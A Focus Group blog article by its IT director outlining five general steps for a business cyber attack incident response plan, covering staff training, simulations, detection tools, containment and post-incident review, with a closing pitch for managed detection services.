5 steps to creating an effective cyber attack incident response plan

Author: Laurence Glen  |  Date published: January, 10, 2023, UK  |  Read est: 4 min read

Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group
Focus Group

October is Cyber Security Awareness Month, and as part of our commitment to keeping your business safe from hackers, we are sharing a comprehensive guide on how to prevent and respond to cyber attacks swiftly and safely.

A cyber security breach can have far-reaching consequences, including significant costs, operational disruptions, and damage to your organisation's reputation. To mitigate these risks, it's crucial to have a well-prepared cyber attack response plan in place. In this article, we will delve into the five key steps to creating an effective incident response plan: prevention, practice, detection, containment, and post-incident actions. By the end of this guide, you will have a clear understanding of how to prevent a cyber attack and respond to one effectively.

1. Prevention

Training your Staff:

Cybersecurity training is the foundation of prevention. Educate your employees about the latest cyber threats, common attack vectors like phishing, and the importance of adhering to security policies. Training should be ongoing to keep staff vigilant and informed.

Invest in the Right Security:

Invest in robust security infrastructure, including firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), and antivirus software. Regularly update and patch these systems to address vulnerabilities promptly.

Security Monitoring:

Consider outsourcing security monitoring to a dedicated cybersecurity company. They can provide 24/7 monitoring, threat detection, and rapid response, reducing the burden on your internal IT team.

Access Controls:

Regularly review access controls and permissions. Implement multi-factor authentication (MFA) to add an extra layer of security. Limit admin privileges to as few accounts as possible and change default passwords to strong, unique ones. Reduce the number of access points that need monitoring, simplifying security management.

Departmental Involvement:

Identify which departments should be involved in your cyber attack response plan. Senior management, IT, legal, customer service, and marketing all play crucial roles in responding to and recovering from an attack.

Communication Plan:

Establish alternative communication channels, such as secure messaging apps or phone systems, to ensure quick communication in case corporate email or other primary channels are compromised during an attack.

2. Practice

Send Fake Phishing Attacks:

Conduct regular phishing exercises to assess your employees' ability to recognize and report phishing attempts. This helps improve their awareness and response to social engineering attacks.

Run Simulations:

Practice incident response through simulations. Create scenarios that mimic real-world cyber threats and test the effectiveness of your response plan. Ensure key team members know their roles and responsibilities during a crisis.

Stay Informed:

Keep your teams updated about emerging cyber threats and scams. Regularly provide training and awareness sessions to ensure that everyone is well-informed about the evolving threat landscape. Encourage reporting of suspicious activity.

3. Detection

Prioritise Assets:

Identify and classify your organisation's highest-priority assets. Knowing what needs protection allows you to allocate resources and implement tailored security measures effectively. This also helps assess the potential impact of an attack.


Achieve comprehensive visibility into your network. Understand adversary tactics, techniques, and procedures (TTPs), entry points, and points of persistence. Maintain historical data backups to analyse past incidents and trends for threat intelligence.

Incident Response Tools:

Implement advanced incident response tools like Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR). These tools enable proactive threat hunting, allowing you to detect indicators of compromise and assess the scope of an attack more effectively.

4. Containment

Remedial Actions:

In the event of an attack, your IT and security teams should be equipped to take immediate remedial actions. These actions include isolating affected hosts, blocking malicious files, processes, and programs, and freezing compromised accounts to prevent further damage.

Cut Off Access:

To contain an attack, block command and control (C2) and malicious website activity. Remove adversary artefacts and tools from compromised systems. Close known entry points and areas of persistence used by attackers. Adjust configurations to enhance security, including threat policies and endpoint security settings.

Restore Assets:

Ensure a comprehensive recovery process. Restore impacted assets using offline backups to prevent re-infection. Confirm the integrity of restored systems before bringing them back online to prevent lingering vulnerabilities.

5. Post-Incident

Resolution Assurance:

Conduct a thorough post-incident review to ensure that all issues have been fully resolved. Leave no room for hidden problems that attackers could exploit in the future.


After an incident, communicate openly with employees and customers. Transparency is key to maintaining trust. Provide clear information about the incident, the actions taken to mitigate it, and any potential impact on data or services.

Continuous Improvement:

Continuously analyse and assess your cyber attack response plan. Identify weak points and areas for improvement. Consider partnering with a Managed Detection and Response (MDR) provider to enhance your ongoing security posture and readiness against cyber threats. Regularly update your plan to adapt to evolving threats and technologies.

By diligently following these steps, companies can build a robust cyber attack response plan that not only helps prevent attacks but also ensures a swift and effective response if an incident occurs. Cybersecurity is an ever-evolving field, and proactive measures are essential to protect against emerging threats.

Laurence Glen photo

Laurence Glen
IT Director

Our IT world, together with the ongoing development of this business-critical portfolio of services, is in very capable hands with Laurence at the helm. IBM-trained and with a 22-year track record of proven success in the IT sector ensures Laurence is perfectly placed to lead the overall IT strategy for Focus Group, ensuring we’re at the forefront of product development and service innovations in order to deliver the best possible IT technologies for our customers.

Subscribe to our newsletter for the latest news, exclusive offers and top tips on tech